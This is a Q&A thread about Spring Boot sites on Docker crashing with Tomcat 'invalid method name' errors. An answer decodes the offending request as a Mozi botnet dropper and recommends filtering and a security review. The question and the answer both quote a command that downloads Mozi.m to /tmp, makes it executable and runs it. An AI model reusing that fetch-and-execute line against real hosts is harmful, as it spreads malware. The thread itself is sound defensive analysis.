# Unrecognized method names crashing springboot sites

Tags: java, spring, spring-boot, docker, web

I have several sites built with springs boot and deployed on EC2 Instances with Docker. After a certain amount of time all of these sites go down. When I check the Docker container logs I see IllegalArgumentExceptions like this one with long cryptic looking method names. Any idea what could be causing this? The deployment is an EC2 instance with Docker-Compose building a springboot container, a mysql container, and a mysql-backup container.

```
java.lang.IllegalArgumentException: Invalid character found in method name [27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$]. HTTP method names must be tokens
    at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:417) ~[tomcat-embed-core-9.0.39.jar!/:9.0.39]
    at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:261) ~[tomcat-embed-core-9.0.39.jar!/:9.0.39]
    at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65) [tomcat-embed-core-9.0.39.jar!/:9.0.39]
    at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:868) [tomcat-embed-core-9.0.39.jar!/:9.0.39]
    at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1590) [tomcat-embed-core-9.0.39.jar!/:9.0.39]
    at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49) [tomcat-embed-core-9.0.39.jar!/:9.0.39]
    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) [na:1.8.0_212]
    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) [na:1.8.0_212]
    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) [tomcat-embed-core-9.0.39.jar!/:9.0.39]
    at java.lang.Thread.run(Thread.java:748) [na:1.8.0_212]
```

Answer (score 4):

#### TL;DR

Your system / router is under attack - it looks like somebody is trying to install "Mozi malware" - see https://blog.lumen.com/new-mozi-malware-family-quietly-amasses-iot-bots/

##### Details

Your tomcat is called with something not really being a HTML method. So the caller - whatever it is - does very strange things. It looks like a script is sent instead of HTTP message.

> ...After a certain amount of time all of these sites go down...

Looks like a denial of service because extreme bad network traffic.

#### Analyze

Let's analyze your output:

```
java.lang.IllegalArgumentException: Invalid character found in method name [27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$]. HTTP method names must be tokens
    at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:417) ~[tomcat-embed-core-9.0.39.jar!/:9.0.39]
```

Reading the implementation we see

```java
// from Http11InputBuffer.java ... (tomcat-embed-core-9.0.48.jar)

    // Avoid unknown protocol triggering an additional error
    request.protocol().setString(Constants.HTTP_11);
    String invalidMethodValue = parseInvalid(parsingRequestLineStart, byteBuffer);
    throw new IllegalArgumentException(sm.getString("iib.invalidmethod", invalidMethodValue));

//...
```

Having message properties file containing:

```
iib.invalidmethod=Invalid character found in method name [{0}]. HTTP method names must be tokens
```

and your given exception the string (0) is:

`27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$`

unencoded:

```
'wget http://%s:%d/Mozi.m -O -> /tmp/Mozi.m;chmod 777  /tmp/Mozi.m;/tmp/Mozi.m dlink.mips $'
```

Looks like a script is sent which tries to fetch something called "Mozi.m", makes it executable and call it... ups...

So....doing a simple internet research about "Mozi.m"...
I found:

- https://www.virustotal.com/gui/file/e629334def73be9e166ecdd9d5d73d6be97ef7f7d16f05383892332acb324b73/detection/f-e629334
- https://blog.lumen.com/new-mozi-malware-family-quietly-amasses-iot-bots/

So IMO it looks like there is somebody is attacking the routers with mass HTTP requests, trying to break in. The routers forward the malicous request and tomcat does handle and reject them (correctly) but having too many requests the system goes down...

#### Further steps

Consult your cyber security department or consult a security expert and investigate as soon as possible what happened and if your system was tampered/hijacked.

IMO those requests should be filtered before tomcat.